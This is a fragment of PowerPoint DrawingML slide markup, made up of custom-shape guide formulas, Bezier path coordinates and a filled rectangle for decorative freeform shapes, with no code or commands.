              <a:gd name="connsiteY4" fmla="*/ 2166836 h 2204007"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2091775 h 2204007"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051896 h 2204007"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2042034 h 2204007"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1995536 h 2204007"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1944748 h 2204007"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1794705 h 2204007"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672878 h 2204007"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1610325 h 2204007"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1563229 h 2204007"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1504249 h 2204007"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1422130 h 2204007"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357875 h 2204007"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301945 h 2204007"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237926 h 2204007"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089882 h 2204007"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089882 h 2204007"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 654437 h 2204007"/>
              <a:gd name="connsiteX22" fmla="*/ 8203042 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 355731 h 2204007"/>
              <a:gd name="connsiteX23" fmla="*/ 8682888 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 156104 h 2204007"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 127810 h 2204007"/>
              <a:gd name="connsiteX25" fmla="*/ 9142920 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 58582 h 2204007"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1799 h 2204007"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1799 h 2204007"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2204007 h 2204007"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2204007 h 2204007"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179933 h 2204007"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2166836 h 2204007"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2091775 h 2204007"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051896 h 2204007"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2042034 h 2204007"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1995536 h 2204007"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1944748 h 2204007"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1794705 h 2204007"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672878 h 2204007"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1610325 h 2204007"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1563229 h 2204007"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1504249 h 2204007"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1422130 h 2204007"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357875 h 2204007"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301945 h 2204007"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237926 h 2204007"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089882 h 2204007"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089882 h 2204007"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 654437 h 2204007"/>
              <a:gd name="connsiteX22" fmla="*/ 8203042 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 355731 h 2204007"/>
              <a:gd name="connsiteX23" fmla="*/ 8682888 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 156104 h 2204007"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 127810 h 2204007"/>
              <a:gd name="connsiteX25" fmla="*/ 9142920 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 58582 h 2204007"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1799 h 2204007"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1799 h 2204007"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2204007 h 2204007"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2204007 h 2204007"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179933 h 2204007"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2166836 h 2204007"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2091775 h 2204007"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051896 h 2204007"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2042034 h 2204007"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1995536 h 2204007"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1944748 h 2204007"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1794705 h 2204007"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672878 h 2204007"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1610325 h 2204007"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1563229 h 2204007"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1504249 h 2204007"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1422130 h 2204007"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357875 h 2204007"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301945 h 2204007"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237926 h 2204007"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089882 h 2204007"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089882 h 2204007"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 654437 h 2204007"/>
              <a:gd name="connsiteX22" fmla="*/ 8203042 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 355731 h 2204007"/>
              <a:gd name="connsiteX23" fmla="*/ 8682888 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 156104 h 2204007"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 127810 h 2204007"/>
              <a:gd name="connsiteX25" fmla="*/ 9142920 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 58582 h 2204007"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1799 h 2204007"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 859 h 2203067"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2203067 h 2203067"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2203067 h 2203067"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2178993 h 2203067"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2165896 h 2203067"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2090835 h 2203067"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2050956 h 2203067"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2041094 h 2203067"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1994596 h 2203067"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1943808 h 2203067"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1793765 h 2203067"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1671938 h 2203067"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1609385 h 2203067"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1562289 h 2203067"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1503309 h 2203067"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1421190 h 2203067"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1356935 h 2203067"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301005 h 2203067"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1236986 h 2203067"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1088942 h 2203067"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1088942 h 2203067"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 653497 h 2203067"/>
              <a:gd name="connsiteX22" fmla="*/ 8203042 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 354791 h 2203067"/>
              <a:gd name="connsiteX23" fmla="*/ 8682888 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 155164 h 2203067"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 126870 h 2203067"/>
              <a:gd name="connsiteX25" fmla="*/ 9142920 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 57642 h 2203067"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 859 h 2203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9288370" h="2203067">
                <a:moveTo>
                  <a:pt x="9285549" y="859"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9288065" y="743433"/>
                  <a:pt x="9285854" y="1460493"/>
                  <a:pt x="9288370" y="2203067"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="2203067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55380" y="2178993"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="73723" y="2172204"/>
                  <a:pt x="91063" y="2167343"/>
                  <a:pt x="106098" y="2165896"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="218614" y="2113687"/>
                  <a:pt x="311471" y="2109992"/>
                  <a:pt x="370723" y="2090835"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="461604" y="2050956"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="511794" y="2042666"/>
                  <a:pt x="630174" y="2045052"/>
                  <a:pt x="671860" y="2041094"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="831551" y="2029819"/>
                  <a:pt x="796957" y="2010095"/>
                  <a:pt x="859506" y="1994596"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="925148" y="1977667"/>
                  <a:pt x="982441" y="1946437"/>
                  <a:pt x="1056432" y="1943808"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1141460" y="1949662"/>
                  <a:pt x="1229014" y="1839077"/>
                  <a:pt x="1336276" y="1793765"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1443537" y="1748453"/>
                  <a:pt x="1618734" y="1681551"/>
                  <a:pt x="1700002" y="1671938"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1770796" y="1652622"/>
                  <a:pt x="1886491" y="1607508"/>
                  <a:pt x="1925247" y="1609385"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1979773" y="1591110"/>
                  <a:pt x="1997283" y="1579968"/>
                  <a:pt x="2056727" y="1562289"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2118428" y="1524336"/>
                  <a:pt x="2272492" y="1514307"/>
                  <a:pt x="2281913" y="1503309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2313559" y="1509407"/>
                  <a:pt x="2384024" y="1432152"/>
                  <a:pt x="2402058" y="1421190"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2444082" y="1402817"/>
                  <a:pt x="2459748" y="1386764"/>
                  <a:pt x="2522221" y="1356935"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2583351" y="1338655"/>
                  <a:pt x="2592153" y="1324759"/>
                  <a:pt x="2689698" y="1301005"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2846360" y="1290467"/>
                  <a:pt x="2933220" y="1259857"/>
                  <a:pt x="3001703" y="1236986"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3437947" y="1088942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4209051" y="1088942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7197317" y="653497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8203042" y="354791"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8405521" y="58626"/>
                  <a:pt x="8461507" y="221706"/>
                  <a:pt x="8682888" y="155164"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8730870" y="183830"/>
                  <a:pt x="8822250" y="173420"/>
                  <a:pt x="8943475" y="126870"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9095367" y="26013"/>
                  <a:pt x="9069294" y="84165"/>
                  <a:pt x="9142920" y="57642"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9206215" y="62810"/>
                  <a:pt x="9198626" y="-8563"/>
                  <a:pt x="9285549" y="859"/>
                </a:cubicBez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DC864E-A348-4E87-AE2E-1861FE991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9546" y="441736"/>
            <a:ext cx="10792612" cy="5426887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EFEEE9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B42EA8D-47D0-4305-A5B1-0BD484F3A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496109" y="-2127221"/>
            <a:ext cx="5199782" cy="10540945"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst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6 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 4850104 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 7596066 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 7596068 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 7916119 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 10239915 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 3145747 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 2810340 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY41" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX42" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY42" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX43" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY43" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX44" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY44" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX45" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY45" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX46" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY46" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX47" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY47" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX48" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY48" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX49" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY49" fmla="*/ 7956458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6 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 4850104 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 7596066 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 7596068 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 7916119 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 10239915 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 3145747 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY41" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX42" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY42" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX43" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY43" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX44" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY44" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX45" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY45" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX46" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY46" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX47" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY47" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX48" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY48" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX49" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY49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6 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 4850104 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 7596066 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 7916119 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 10239915 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 3145747 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY41" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX42" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY42" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX43" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY43" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX44" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY44" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX45" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY45" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX46" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY46" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX47" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY47" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX48" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY48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6 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 4850104 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 7916119 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 10239915 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 3145747 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY41" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX42" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY42" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX43" fmla="*/ 30530 w 4123786"/>
